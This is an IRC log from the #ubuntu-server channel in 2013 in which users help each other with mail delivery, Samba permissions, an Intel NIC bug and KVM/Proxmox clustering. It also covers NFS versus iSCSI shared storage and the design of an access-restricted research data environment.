<RoyK> Arrick: first - make sure email works
<smoser> hallyn_, you should fix lxc template for cirros to do --user-data on clone
<smoser> like i did for '-t ubuntu-cloud'
<RoyK> Arrick: as root (or any user), try to email root to see if it works. if it doesn't, check the logs. local email is just files, so it should be trivial indeed
<Arrick> it doesnt throw any errors when I send it..
<RoyK> Arrick: not in the mail logs either?
<Arrick> it shows as sent in the logs
<RoyK> pastebin?
<Arrick> !pastebin
<ubottu> For posting multi-line texts into the channel, please use http://paste.ubuntu.com | To post !screenshots use http://imagebin.org/?page=add | !pastebinit to paste directly from command line | Make sure you give us the URL for your paste - see also the channel topic.
<Arrick> http://paste.ubuntu.com/6067312/
<RoyK> hm - miworksmo.org doesn't haven an MX
<Arrick> lol
<RoyK> do you try to email root alone or root@miworksmo.org?
<Arrick> its internal on our exchange server
<Arrick> root alone
<RoyK> try root@localhost
<hallyn_> smoser: uh, i'll takea  look
<hallyn_> zul: .
<zul> hallyn_:  i totally forgot now
<smoser> hallyn_, just something i wanted to do , but wouldn't get to. but would like for general demonstration purposes in lxc in ubuntu.
<hallyn_> zul: ok
<Arrick> nope... Im not going to worry about it rightnow RoyK, I'll have to come back to it, i have a LOT of other issues, as long as cron is running I'm not worried right now... thanks for all the help
<hallyn_> smoser: yeah but you're donig it using a clone hook, so presumably i'll need to write a new hook for cirros (maybe i can reuse the one - needto look)
<smoser> hallyn_, probably have to write a new one, yes.
<smoser> but same as ubuntu, just move the code that *did* that from the create to the clone.
<hallyn_> right
<lequtix> hi all
<RoyK> evening
<RoyK> good localtime();
<lequtix> where are you roy/
<lequtix> ?
<RoyK> .no
<RoyK> lequtix: what about you?
<lequtix> BC, Canada
<RoyK> k
<lequtix> i don't see where u said you live
<RoyK> .no == norway ;)
<lequtix> OH ok
<lequtix> :D
<lequtix> what's the weather like there right now
<lequtix> its' cloudy here today..  about 18 degrees celcius
<lequtix> looks about the same as here in oslo
<RoyK> about the same here ;)
<lequtix> sucks summer is ending
<RoyK> http://www.yr.no/place/Norway/Oslo/Oslo/Oslo/hour_by_hour_detailed.html
<RoyK> yr.no is nice ;)
<RoyK> yr means drizzle...
<lequtix> cool
<RoyK> :)
<lequtix> what are you working on?  i'm bored at work
<lequtix> lol
<RoyK> check out the forecasts on yr.no in your hometown - it's not bad
<sarnold> RoyK: nice website..
<RoyK> I'm at home, but at work, I work with scientists requesting interesting things for research projects
<lequtix> interesting job?
<lequtix> you enjoy it?
<RoyK> yep
<RoyK> I work for hioa.no
<lequtix> what kind of things do they request?
<RoyK> large focus on secure storage now
<RoyK> since we don't have a good thing for that atm
<lequtix> so that's why u are working with zfs?
<RoyK> that's private
<RoyK> I've been working with zfs for some time
<lequtix> encrypted FS isn't good for secure storage?
<RoyK> zfs encryption only exists in solaris 11, not the open version
<lequtix> use ext4
<lequtix> lol
<RoyK> and by security, I mean access
<lequtix> ah
<RoyK> the datacentre is easy to secure
<sarnold> tahoe-lafs? :)
<RoyK> access is worse
<lequtix> require vpn
<lequtix> to access fiels
<lequtix> maybe
<lequtix> :O
<RoyK> interesting
<RoyK> didn't know that
<lequtix> or WebDAV
<lequtix> shares
<lequtix> you can choose networks and users
<RoyK> well, the issue is you have to allow several users to share a set of data, and not allow them to download anything
<RoyK> so some sort of remote desktop system
<rdw200169> RoyK: yeah, this is definitely not a problem solved by zfs
<RoyK> with two-factor authentication and no internet access from the box
<lequtix> impossible
<lequtix> if they can read they can download
<RoyK> lequtix: you can photograph the monitor, sure, but if you stop them from downloading masses of data, it makes security better
<RoyK> lequtix: you can't make it 100% secure, but you can possibly make it 95% secure, which is what the authorities say is sufficient
<rdw200169> RoyK: assuming you let them access with SSH, its all but impossible
<RoyK> rdw200169: not ssh
<RoyK> some remote desktop thing like rdp or preferably SPICE
<RoyK> rdp sucks at security on audio
<RoyK> and some projects need to use video (and the corresponding audio)
<lequtix> yea.. if you only enable RDP or FreeNX
<lequtix> and disable email to outside domains
<RoyK> lequtix: not only email - the system must be totally offline to the outside world
<RoyK> a way in, no way out
<sarnold> RoyK: wouldn't it be bloody annoying to be doing all the analsys over a remote link like that? the few times I've been forced to use citrix thingy I detested every second of it
<RoyK> sarnold: doesn't matter much - sensitive data like patient information can't be made available
<hallyn_> except to third parties who pay for it <scoff> so long as they claim they'll honor hipaa.
<sarnold> hallyn_: .no, probably no hipaa :)
<lequtix> that's gonna require some pretty creative firewall rules
 * hallyn_ is disgusted with the state of data privacy today
 * hallyn_ goeselsewhere to hide his disgust
<sarnold> hallyn_: it's probably better in norway. they put RoyK in charge of it, afterall :)
<lequtix> so the datacenter itself has to be segregated from the outside world... then have a terminal server that's on the datacenter's VLAN AND an exposed VLAN
<sarnold> lequtix: brutal is easier than nuanced, in my experience..
<hallyn_> sarnold: maybe sanity elsewhere will be contageousandcatch on here
<lequtix> then use policy on the terminal server to disable all outside activity
<lequtix> except 3389 tcp
<lequtix> or firewall rules
<sarnold> hallyn_: we can hope :)
<lequtix> i guess it's not so hard
<lequtix> just have  a terminal server on two networks..  one only allows 3389tcp and one that allows only the terminal server
<lequtix> that would be about as good as it's possible to get..
<hallyn_> sarnold: ican't figure out how no one has asked how snowden bypassed rbac+mls+te to get to all that data.  being an admin should not mean you get all the data.  (my feelings on whether it was good or bad that he got it aside)
<hallyn_> but anyway, i get touchy bc that's why i left my last employer :)
<hallyn_> all right, back to work :)
<lequtix> where are you guys located?  i'm in canada
<lequtix> BC..
<hallyn_> US.  up and down the middle at variosu points
<sarnold> hallyn_: I have a feeling rbac+mls+te were designed to give him the entirety of the information on purpose. I fully expect no policies were violated..
<hallyn_> sarnold: every person in any way in charge of policies and implementations should be undergoing a job review right now
<RoyK> sarnold: hipaa?
<RoyK> lequtix: rdp will open an unsecured tunnel back to the system if audio is used
<lequtix> you can disable the audio etc with policy
<lequtix> group policy
<RoyK> sure
<RoyK> but part of the thing was to *allow* audio
<lequtix> ugh
<lequtix> why would u wanna stream audio over the rdp connection
<lequtix> lol
<RoyK> which makes it a bit harder
<lequtix> poor performance
<RoyK> lequtix: not necessarily over rdp, but over a remote connection.
<RoyK> lequtix: we have this project where kids in kindergarden are interviewed for research of how they will become according to how they act as kids (not sure how to explain that in English)
<RoyK> lequtix: and that sort of data is rather sensitive
<sarnold> hallyn_: completely agreed there. they ought to buy a giant FAIL stamp to save some effort.. :)
<lequtix> i understand
<lequtix> so the interviews are audio?
<RoyK> and video
<hallyn_> heh and lots of ink
<lequtix> and they upload the data via the RDP connection (or whatever type of connection you decide to use)
<hallyn_> RoyK: do the parents get to opt the kids out?
<sarnold> RoyK: hipaa is the .us "effort" at patient privacy -- it might actually be an improvement over earlier legislation, but it limits spread of data to people, contractors, who signed contracts -- i.e., very little actual containment of data.
<lequtix> with RDP Record is different function than playback
<RoyK> hallyn_: of course
<lequtix> you can get the data in but disallow playback
<hallyn_> RoyK: "of course" - that's not that obvious :)  glad it is where you are though.
<hallyn_> like i said, hoping sanity is contagious
<RoyK> hallyn_: http://datatilsynet.no/English/ are rather strict
<RoyK> which is good imho
<lequtix> i suppose they could connect to the datacenter with managed workstations with policies in effect to disable any external storage devices..
<lequtix> like usb or cdr
<lequtix> or email
<RoyK> lequtix: if that datacentre is secure, indeed, but very few are
<lequtix> IAAS infrastructure could make it a bit easier to secure things
<lequtix> each VM server has it's own sandboxed environment and network
<RoyK> lequtix: it needs to be certified by datatilsynet.no
<lequtix> like Amazon EC2
<RoyK> lequtix: very few are
<lequtix> but private
<RoyK> amazon will probably never be certified - the US govt have access there
<lequtix> RoyK .. i mean to implement your own virtualized infrastructure
<lequtix> LIKE amazon
<lequtix> easier to secure everything becuase everything is sandboxed
<lequtix> you have to explicitly create links between the environments
<RoyK> we have a couple of vmware clusters, thinking of using one of them or creating a new one
<lequtix> yes ESX is nice
<lequtix> you can do the same with HyperV
<lequtix> or ProxMox
<RoyK> lequtix: uio.no has been working on a very good solution for ages - https://www.usit.uio.no/prosjekter/tsd20/ (apparently only in norwegian)
<RoyK> but they're almost a year late
<RoyK> lequtix: I don't like hyperv
<lequtix> yea it's very heavy
<RoyK> lequtix: had some really bad issues with ubuntu on hyperv
<lequtix> I'm a proxmox user personally
<lequtix> i like the OpenVZ/KVM integration
<RoyK> heavy network traffic and the vm just lost networking - nothing in the logs
<lequtix> ProxMox or VMware
<lequtix> HyperV is still in it's infancy.. microsoft is years behind with their Virtualization product
<lequtix> i think too late
<RoyK> kvm is getting some
<RoyK> still low on the admin bit, but the tech bits are good
<lequtix> have you tried the ProxMox product?
<lequtix> its free
<RoyK> never heard of it
<lequtix> you must try it
<lequtix> http://pve.proxmox.com/wiki/Main_Page
<lequtix> its a distro to mimic esx
<RoyK> nice
<lequtix> it has kvm and openvz
<lequtix> and really nice html5 web interface
<RoyK> any idea what it's based on?
<lequtix> debian
<RoyK> and does it support clustering?
<lequtix> wheezy
<lequtix> yes
<sarnold> and rhel kernel for openvz, apparnetly
<RoyK> tried to setup clustering with that?
<lequtix> no it's custom for them i think
<lequtix> it supports GFS
<lequtix> glusterfs
<lequtix> give it a try... the iso is small.. 400k
<RoyK> glusterfs isn't a clustering filesystem
<RoyK> well, it is, but the other way around
<lequtix> lol
<RoyK> spread data, not make it redundant as with OCFS2 or GFS2
<lequtix> it also supports live migration
<lequtix> within the cluster
<RoyK> so does standard redhat/centos/ubuntu
<RoyK> */*
<lequtix> well.. it is just basically KVM with a nice interface
<lequtix> give it a try
<lequtix> works well from install
<RoyK> I setup a kvm cluster on two nodes with centos - it was a PITA
<RoyK> lequtix: have you setup a *cluster* from install?
<lequtix> i never had a SAN
<RoyK> well, you could use DRBD
<lequtix> so i haven't tried the cluster.. but it works nice stand alone from install
<lequtix> thats what it uses
<lequtix> DRBD
<lequtix> now that you mention it
<lequtix> it only works on the local subnet cus it's broadcast right?
<lequtix> that was the limitation.. proxmox clusters have to exist on the same subnet
<lequtix> just give it atry
<sarnold> I hope they move to multicast, ipv6 has no broadcast.
<lequtix> you will like it
<lequtix> you can use /etc/network/interfaces to setup as many bridges and private lans you need to use with the VM's
<lequtix> that's kinda nice
<lequtix> its basically just a minimal linux install
<lequtix> with a web interface
<lequtix> u can do with it what you do with regular linux installs
<RoyK> sarnold: heh - hioa.no, where I work, are the best in the class on ipv6 - we do *everything* we can on ipv6, and only the rest on ipv4
<lequtix> but proxmox rocks.. i love it
<RoyK> sarnold: in norway, that is
<smoser> rbasak, http://paste.ubuntu.com/6067241/
<smoser> your thoughts on that data would be appreciated.
<sarnold> RoyK: nice :) my ISP recently rolled out ipv6 support, it's been on my todo list for three weeks now.. :)
<RoyK> lequtix: does it have an option for clustering on a SAN with GFS2 or OCFS2?
<lequtix> yes.. goes glusterfs
<lequtix> does
<lequtix> GFS2
<RoyK> glusterfs != cluster fs
<RoyK> you can't mount a glusterfs partition on two machines
<RoyK> you can with GFS2 or OCFS2
<lequtix> http://www.proxmox.com/proxmox-ve/features
 * RoyK likes AGPL
<lequtix> this might tell u more
<lequtix> http://www.proxmox.com/proxmox-ve/comparison
<RoyK> gotta try that - got a pair of pizzaboxes for testing
<zul> adam_g: ping http://people.canonical.com/~chucks/ca/
<RoyK> dual quad core something with 24GB RAM
<RoyK> should do well for testing a wee cluster
<lequtix> at the end of the day RoyK it's a debian linux install so u can install/configure whatever storage you want
<RoyK> if it automates some of the headaches I've had with clustering, it's good
<lequtix> to kvm it's all just mountpoints
<lequtix> it has special tools for setting up the cluster
<RoyK> well, sure, but cluster synchronization isn't very easy
<lequtix> but they are command line
<lequtix> this takes care of the sync
 * RoyK is quite used to the commandline
<RoyK> a year from now, I'll celebrate 20 years of running linux ;)
<sarnold> :)
<sarnold> "celebrate" in a "where did time go?" sort of way? :)
<lequtix> i think you will like proxmox
<RoyK> something like that ;)
<RoyK> I'll look into it
<RoyK> we have a lot of old machines that aren't used anymore, machines taken offline or virtualised
<lequtix> i have it running on a machine with amd 6 core cpu and 16 gigs ram
<lequtix> works nice .. have 3 openvz containers and 3 windows vms
<lequtix> more than enuf to test
<RoyK> windows on kvm?
<lequtix> yea
<lequtix> win7 pro and server 2012
<RoyK> I've been using kvm for some time, but never got the hang of failover in clusters
<lequtix> i haven't experimented much with clusters
<lequtix> i don't have the hardware
<RoyK> you need to allow a machine to die
<RoyK> with ESXi, it just works
<RoyK> I'd been working in this job for 3 months or so, when I was installing this blade server that was hanging and didn't take a reboot from the blade centre
<lequtix> how does it work??  you have two servers up at the same time?  when one dies the DNS moves the pointer?
<RoyK> so I walked over to the datacentre and pulled it out
<RoyK> wrong bladcentre
<RoyK> wrong blade
<lequtix> or the vm loads on another host
<RoyK> 30 VMs died, and came up on other blades
<lequtix> oh ok.. i understand
<sarnold> RoyK: wow, that's a good one! :)
<RoyK> didn't feel so touch back then ;)
<lequtix> haha
<lequtix> how long were they down...  1 minute?
<sarnold> RoyK: no, I bet it didn't. but that story will win most bar bets. :) hehe
<RoyK> 1-2 minutes
<lequtix> the proxmox site boasts that it will do that
<RoyK> sarnold: we have a thing at the IT dept
<lequtix> i've never tried it.. you will have to let me know
<RoyK> sarnold: if someone messes up, he needs to bake a cake to the rest
<sarnold> RoyK: how many cakes did this one require? :)
<RoyK> sarnold: I called boss and asked "is this cake?" and was assured "no, not really"
<RoyK> sarnold: we have a software rollout system where windows users can choose between applications to install
<RoyK> sarnold: so not to allow them admin access, but still allow them a predefined set of applications
<lequtix> usually thats done via group policy isn't it royk?
<RoyK> sarnold: the admin scripting this did a slight change one thursday and was home sick the day after, when *all* PCs at hioa.no, about 10k of them, started to install *all* applications in the repository
<lequtix> different OU's can be assigned different software bundles
<RoyK> he made a nice cake
<lequtix> HAHAHAHA
<sarnold> RoyK: hahaha, wow. :D
<sarnold> RoyK: okay, so killing 30 vms won't win against his story. :)
<RoyK> the motto for the department is "we do as good we can" ;)
<RoyK> but there's a lot of good nerds here
<lequtix> everyone makes mistakes
<lequtix> lol
<RoyK> yep
<lequtix> if not.. no one would eat cake
<lequtix> :D
<RoyK> haha
<lequtix> and that is unacceptable
<lequtix> hahahaha
<RoyK> quite so
<lequtix> Proxmox Cluster File System
<lequtix> Proxmox VE uses the unique Proxmox Cluster file system (pmxcfs), a database-driven file system for storing configuration files. This enables you to store the configuration of thousands of virtual machines by configuring them only once. By using corosync, these files are replicated in real time on all cluster nodes. The file system stores all data inside a persistent database on disk, nonetheless, a copy of the data resides in RAM which provides a max
<lequtix> imum storage size is 30MB - more than enough for thousands of VMs.
<lequtix> here u go royk
<lequtix> how it does cluster
<RoyK> lequtix: interesting
<lequtix> i think it has the broadcast limitation tho
<lequtix> requires all hosts be on the same subnet
<RoyK> gotta try to setup a test on that with 3-4 nodes
<lequtix> maybe they changed it recently
<RoyK> just need to setup a freebsd-based zfs storage first
<RoyK> then some old pizzaboxes
<lequtix> so if i were to make an iSCSI target you would recommend freebsd and zfs?
<RoyK> we have a new datacentre with a dedicated rack for test stuff
<lequtix> for testing this stuff?
<RoyK> yep
<RoyK> some 10TiB+ of storage and some machines to run the good stuff
<lequtix> what are the alternatives
<RoyK> we have 150+TB on EqualLogic with vmware
<lequtix> i'm a noob when it comes to san and iscsi.. although i know a few things
<RoyK> iscsi isn't too hard
<RoyK> I've not used ZFS professionally on fbsd, only on solarises
<lequtix> my question comes when multiple devices mount one iscsi target
<RoyK> like openindiana
<lequtix> how does it not corrupt
<RoyK> you need a filesystem like GFS2 or OCFS2 with corosync or similar
<lequtix> do they use a special file system
<lequtix> AH ok
<RoyK> not many filesystems support sharing
<RoyK> and clusterd to kick out nodes that don't reply
<lequtix> so you only need corosync with ocfs2?
<lequtix> you can use gfs2 alone?
<RoyK> no
<lequtix> allways need corosync?
<RoyK> gfs2 needs a daemon to control who can write
<RoyK> and clusterd to kick out nodes that don't reply
<lequtix> and all that is installed only on the san
<RoyK> as with hard reset
<lequtix> its transparent to the hosts right?
<lequtix> the hypervisor hosts
<RoyK> you can do it easier with nfs
<lequtix> ok... now i have a question about NFS
<lequtix> lol
<lequtix> sorry
<RoyK> don't be sorry ;)
<lequtix> its relating to permissions ..  does nfs support filesystem level security?  or is it just host based (network) secutirt
<lequtix> security
<lequtix> like how does an nfs share map who accesses what?
<RoyK> NFS1-3 supports posix ACLs
<RoyK> NFS4 supports the new ACL regime, compatible with NTFS etc
<lequtix> ok... so who controls that
<RoyK> in which?
<lequtix> the san?  or the hypervisor hosts
<lequtix> ok.. i have a san using GSFS2 and Corosync
<RoyK> a SAN device is just a blockdevice
<lequtix> it hosts a share
<lequtix> nfs
<lequtix> which box controls file access
<RoyK> your SAN isn't using a filesystem
<RoyK> all the boxes in the cluster
<lequtix> ok..  so the san only presents a block device (unformatted drive)
<RoyK> that's where corosync comes in
<RoyK> lequtix: the san is usually as dumb as a disk
<lequtix> so the hypervisor hosts have to manage the file system
<RoyK> the hypervisor manages processes
<RoyK> corosync manages sync writes
<lequtix> i'm speaking in terms of low level disk activity
<lequtix> not necessisarly the virtualization
<RoyK> clusterd manages write coherency
<RoyK> you don't use shared storage unless you do virtualisation
<lequtix> and clusterd is corosync?
<RoyK> no, corosync makes sure GFS2 or OCFS2 are in sync
<RoyK> clusterd makes sure the processes of virtualization are running and are not crashing and kicks out those who make trouble
<lequtix> i'm more interested in what happens with the shared file systems before the vm's even load
<lequtix> the hosts mount the NFS share (which is an unformatted disk)
<lequtix> how do you format it
<RoyK> lequtix: this one is long
<RoyK> https://alteeve.ca/w/2-Node_Red_Hat_KVM_Cluster_Tutorial
<RoyK> but it's good
<lequtix> ok hahah
<RoyK> an nfs share is not an unformatted disk, it's a shared drive
<RoyK> lequtix: read that one if you want to setup a cluster
<RoyK> first: read "a note of patience"
<lequtix> ok.. so it's better then to use iscsi because then the vm hosts do the formatting
<RoyK> you'll still have to use GFS2 and corosync and clusterd
<RoyK> there's no easy way out, I'm afraid
<RoyK> if you haven't setup the sync correctly, you suddenly have two VMs writing to the same filesystem
<RoyK> which is somewhat troublesome
<RoyK> filesystems don't like that
<RoyK> filesystems like ext4
<RoyK> which are run on top of GFS2
<lequtix> no no i don't want a fast way out
<lequtix> i'm just trying to get my head around the process
<lequtix> i'll read that page
<RoyK> then bide your time and read that tutorial
<RoyK> it's not your average 10 minute tutorial - it's the other sort
<lequtix> yes i see that
<RoyK> and it's thorough
 * RoyK guesses lequtix will surface some time on sunday asking new questions ;)
<lequtix> hahah
<lequtix> i know enuf to understand broadly
<lequtix> i just want the nuonce
<RoyK> lequtix: enough?
<RoyK> and what does nuouch mean?
<Pici> I think they meant nuance
<adam_g> zul, do we plan on keeping that mongodb delta in the future?
<zul> adam_g:  i believe so
<adam_g> zul, can we push it to ~ubuntu-cloud-archive as a bzr branch with the included changes?
<zul> adam_g:  sure
<adam_g> zul, id like to start keeping anything with deltas under VCS
<zul> adam_g:  wait there is no delta here its a straight backport
<adam_g> zul, oh! my bad, i read that .changes wrong and thought the patches were only applied for the CA
<adam_g> zul, in that case +1
<zul> thx
<lequtix> RoyK i meant Nuance ..  http://www.merriam-webster.com/dictionary/nuance
<RoyK> k
<lequtix> this document is very detailed
<RoyK> it certainly is
<lequtix> hardware i will use to learn does not have 6 NIC's
<lequtix> lol
<lequtix> its almost too verbose for starting out
<RoyK> you don't need to use that hardware
<lequtix> i'm less interested in the securty portion and more interested in how it works
<RoyK> then scroll down
<lequtix> but i suppose network failover is just as important as anything else
<RoyK> it is
<RoyK> but then, if you have enough nodes, it shouldn't matter much
<RoyK> unless the switch dies
<RoyK> which they tend to do now or then
<lequtix> 2/3 of the document focuses on network tolerance..  failover for switch failure
<lequtix> and seperating netoworks for storage and internet and cluster traffic
<RoyK> keep focus on what's on kvm etc
<lequtix> good policy but overkill for my needs
<lequtix> lol
<lequtix> do most computers support IPMI?
<lequtix> so i can't do fencing either
<RoyK> fencing is rather important
<RoyK> without it and with a network outage, you can end up with two VMs on the same disk
<lequtix> so to even test HA you need to have real server hardware that supports IPMI
<RoyK> cooperatingly corrupting data
<lequtix> yea i understand the implications.. but i don't have expensive hardware
<RoyK> you can test it easily, but if the shit hits the fan, no
<RoyK> if they're on the same network, iscsi and networking together, it's easier
<RoyK> but usually you don't use the same network for data and generaly traffic
<lequtix> i would probably have to use a crossover cable for the cluster traffic
<lequtix> and a switch for the main network
<lequtix> 2 nics in each box
<RoyK> no need for a crossovercable with gigabit
<RoyK> it's autosense by definition
<lequtix> right
<lequtix> i'm old .. what can i say
<lequtix> lol
<RoyK> heh
<RoyK> how old?
<lequtix> 41
<RoyK> damn - I'm almost 40 ;)
<RoyK> 2 months to go
<lequtix> hehe
<lequtix> i'll be 42 in november
<RoyK> when?
<lequtix> 19
<ejv> guess you're old too RoyK
<ejv> ;)
<RoyK> ok, I'll be 40 the 32th
<RoyK> november
<lequtix> this isn't so hard to understand but my questions from before were more related to how the shared file systems worked.. and which node controlled what and who created the filesystems
<lequtix> lol
<lequtix> in a scenario where there are 2 nodes and 1 san...
<lequtix> who controls the filesystem on the shared storage
<lequtix> the nodes?  or the SAN
<RoyK> lequtix: the san is dumb
<lequtix> in the case of a san u use iSCSI
<RoyK> lequtix: the nodes must coordinate access
<lequtix> dump
<lequtix> dumb
<lequtix> right?
<lequtix> with an NFS share the device HOSTING the storage looks after it correct?
<RoyK> lequtix: were it nfs or iscsi or direct access - the nodes need things like corosync
<RoyK> lequtix: otherwise they may start the same vm and mess up
<lequtix> ok.. so i guess i'm asking whats the difference between iScsi targets and nfs shares
<lequtix> with iscsi target the storage is presented as a blank block device
<lequtix> what about nfs?
<lequtix> its presented differently right?
<RoyK> lequtix: it's still shared storage
<RoyK> lequtix: just easier to handle on the server side
<lequtix> which is easier
<lequtix> iscsi or nfs
<RoyK> start out with nfs
<RoyK> no need for a shared filesystem like GFS2
<RoyK> but still the same needs for synch
<lequtix> i dont think you understand what i'm asking
<lequtix> i'm not concerned about sync
<lequtix> i just want to know the difference between and NFS share and iSCSI target in terms of where the filesystem is managed
<RoyK> lequtix: if you setup a cluster without sync, it'll die
<lequtix> remove cluster from the equasion at this point
<RoyK> lequtix: with iscsi, you need a shared filesystem like GFS2 or OCFS2
<RoyK> with more sync there
<RoyK> if you use NFS you only need to sync the cluster, not the storage
<lequtix> with iscsi the nodes manage the filesystem correct?
<lequtix> with ntfs the machine hosting the filesystem manages it
<lequtix> is that correct?
<lequtix> i mean NFS
<lequtix> not ntfs
<RoyK> with nfs, the host is doing the management, with iscsi, you need a shared filesystem like GFS2 or OCFS2
<RoyK> but still, you need sync between the nodes
<lequtix> ok.
<lequtix> right
<RoyK> otherwise they'll overwrite oneanother's sectors
<RoyK> there's no easy way to clustering
<lequtix> so.. when you make an NFS share for the purposes of clustering.. which filesystem do you have to use?
<lequtix> can u just use ext4?
<RoyK> doesn't matter what you use underneath
<lequtix> ok because the nfs daemon manages the locks
<RoyK> xfs, ext4, jfs, even btrfs if you dare
<RoyK> nfs is a network filesystem, so it doesn't care about what's underneath
<lequtix> ok.. i understand now.
<lequtix> with NFS you don't have to worry about filesystem because there is a single host nfs daemon controlling locks for all nodes.
<lequtix> with iscsi, each node has to manage it's own locks therefore you need a sync protocol in there somewhere to make sure everyone's in sync
<RoyK> not quite
<RoyK> with nfs, I/O is sent to a central server which handles everything
<lequtix> so it's impossible for two machines to write to the same locations
<lequtix> with nfs
<RoyK> with shared iSCSI, each host writes individually, so they have to synch up their I/O not to corrupt everything
<lequtix> ok..  you said it better but that's what i meant
<lequtix> thats all i wanted to know this whole time.. hahaha
<RoyK> with NFS two clients (nodes) can still corrupt data if not in sync, but not on the filesystem level
<RoyK> with shared filesystems, things can go a bit worse
<RoyK> shared filesystems as in where devices are shared
<lequtix> and there's no central service to sort things out
<lequtix> the nodes can do whatever they want
<RoyK> in essence, yes
<lequtix> so will NFS allow two nodes to load the same VM?
<lequtix> or will it deny read to one node because it's open already on another?
<lequtix> thats probably what the sync is for
<lequtix> to avoid that
<RoyK> lequtix: no, they will be able to read and write simultanously, but you need corosync to stop them from writing to the same file
<lequtix> ok
<RoyK> lequtix: did you read that document?
<lequtix> still reading
<RoyK> lequtix: then ask afterwards
<lequtix> say i'm not going to cluster..  i want an nfs share to have roaming profiles
<lequtix> basically i want an nfs share for the /home dir
<lequtix> now...  if i login two different computers as the same user.. it will blow up?
<RoyK> just read
<RoyK> it's about the same thing
<RoyK> it takes some understanding to get through this
<t_dot_zilla> im going crazy trying to get a tftp server running on ubuntu
<adam_g> zul, https://code.launchpad.net/~gandelman-a/ubuntu/saucy/horizon/fixes/+merge/184186
<jefgy> I'm using an intel e1000 and while I don't see any issues in syslog or dmesg I seem to be dropping connections regularly on the machines with the e1000(the machines with broadcom nics are fine).    I did a quick search for e1000 issues on 12.04 and didn't immediately see anything.  Does anyone know if there is an issue with the e1000 that I may have overlooked?
<genii> jefgy: If: lspci -vnn | grep '82574'      shows the controller as 82574L maybe try: sudo setpci -s <ID-of-device> CAP_EXP+10.b=40       ...where ID is the first number in the line produced by the previous command. There is a particular bug on the 82574L
<jefgy> genii:Thank you!  I do seem to have the 82574L
<jefgy> I ran sudo setpci -s 02:00.0 CAP_EXP+10.b=40 as you said
<genii> jefgy: Now to keep an eye on traffic and see if connections stay up! I must leave soon but will will be back again tomorrow.
<jefgy> thanks again!
<genii> jefgy: No problem. If this works for you, need to make it run for subsequent boots.
<jefgy> genii: would you recommend adding a line to rc.local?
<genii> jefgy: Or, possibly adding it just before "end script" in /etc/init/network-manager.conf
<jefgy> good plan, I the network traffic has already stabilized and appears to be running similar speeds to the servers running the broadcom nics so I would that does did the trick
<jefgy> I seem to have - a couple of words there
<genii> jefgy: I got the gist :)
#ubuntu-server 2013-09-06
<subman> I've just installed samba and get now use it from another computer and look at the contents of a directory, but that user cannot write to that directory.  should that user be added to the group 'sambashare'?
<subman> In the end, I wanted to create a 'shared directory' on my server where everyone on my local network can exchange files there.
<qman__> subman, you need to set the file permissions such that the user in question has write access
<subman> The user or the group
<qman__> you can set up a group to own the files and add that user to the group, or just make that user own the files, but they need filesystem-level write access
<subman> qman__, I have added the user to the 'sambashare' group and then changed the owner of the directory to that group
<qman__> subman, you also need to grant group write permission
<qman__> chmod -R g+w /path/to/your/share
<qman__> if it still doesn't work, you may have the share set to read-only in samba
<qman__> and will need to change it
<subman> permissions there now:  drwxr-xr-x
<qman__> that permission will prevent writing by members of the group
<zul> adam_g: +1
<twoface88> anyone uses ubuntu-server in highload production services?
<OS-8259> Hello, I try to make the 12.04.3 dist-upgrade, and get stuck on "Found memtest86+ image: /memtest86+.bin"; apt-get seems locked running this command "30_os-prober /etc/grub.d/30_os-prober"
<OS-8259> 10filesystems script was blocking the upgrade process, just killed it; seems ok
<msafi> How can I know what I'll install when I type apt-get install diakonos?
<geser> msafi: add -s (simulate)
<msafi> geser, That's cool to know. It doesn't tell me what diakonos is though?
<geser> ah, that's "apt-cache show diakonos"
<msafi> geser, cool. Thanks a lot!
<jargon> how come when i edit my .bashrc and .bash_aliases, and then run `exec bash` i can use my aliases at the cli. but when i logout and login again it's gone and i have to run `exec bash` again to be able to use my aliases?
<jargon> part
<diegonat> hi guys... https://wiki.ubuntu.com/ServerTeam/MAAS/AvahiBoot where can i find this page? I cannot find instruction about how to do it!
<GeorgeJ> Hello folks!
<GeorgeJ> I want to create an ubuntu server image for a VM. What's the recommended way of cleaning up the instalation before creatig the image? Also, I need to run dpkg-reonfigure openssh-server, to regenerate the ssh keys. What's a nice way of doing this?
<GeorgeJ> I basically just want to prepare an instalation for cloning.
<sarig> hey one all, remote tired .. have an issue, need a sounding board pls
<sarig> ubunto server 12. two disks, /dev/sda /dev/sdb, sda is the root primary, sdb is a store drive. sdb was mounted on /srv/share. Just recovered from a power outage, reboot the server and now /srv/share contains the root file system ??? so if i mv /srv/share/bin/grep to /srv/share/bin/bugger and do an ls on /bin/ I see bugger and no grep ... very confusing .. any thoughts ?
 * sarig labels ??
<tarvid> Want to try Ubuntu+LXC+Docker. What is the best base to install?
<sarig> a little quiet in here today ;-)
<tarvid> looking for a little wisdom myself
 * sarig sorting it with blkid
<diegonat> hi all.... I have got a problem with MAAS but I m not sure how to troubleshoot it. Basically, I set up a MAAS environment and I added one node. However, now I cannot add any other nodes. If you I power up a machine (virtual), it does boot but it doesnt come out in the web control panel. Any idea??
<Lequtix> morning
<Lequtix> anyone alive in here?
 * sarig sorted Phew ... blkid nailed the drives by uuid
<sarig> yep
<Lequtix> how are you sarig?
<sarig> you mean .. someone else is actualy typing :-)
<Lequtix> hahaha
<sarig> good buddy
<Lequtix> i think today will be boring for me...  i don't want to start new projects on fridays
<sarig> just had a remote server puck / onto a samba mount not nice
<sarig> ahh .. for me chuking in elsa
<Lequtix> i don't understand
<sarig> elsa ?
<Lequtix> elsa is a womans name?
<sarig> http://code.google.com/p/enterprise-log-search-and-archive/
<sarig> fed up with alienvault it's got a tad bloated
<Lequtix> :D
<Lequtix> i've never see that because i don't have use for it
<Lequtix> i only have 1 or 2 servers
<sarig> dude i use anything ;-0
<sarig> have dual pII's still running
<Lequtix> NICE!
<Lequtix> :D
<sarig> just built a monster as well on the cheap (well big enough for me)
<Lequtix> like a 56 corvette
<sarig> so ebay
<sarig> hp zw9400
<sarig> 2 x quad core amd = Â£36
<Lequtix> thats a good price
<sarig> 32gb ram = $52
<sarig> the hp was Â£52
<Lequtix> you gonna make a ProxMox server out of it?
<sarig> so approx Â£120 pounds for 2 x quad core, 32Gb ram
<sarig> currently running xen
<Lequtix> http://pve.proxmox.com
<Lequtix> i like proxmox cus it's kvm/openvz and has a web interface.. you don't need windows to manage it
<diegonat> hi all.... I have got a problem with MAAS but I m not sure how to troubleshoot it. Basically, I set up a MAAS environment and I added one node. However, now I cannot add any other nodes. If you I power up a machine (virtual), it does boot but it doesnt come out in the web control panel. Any idea??
<sarig> going to get a couple of icybox's and drop in 8 x drives,
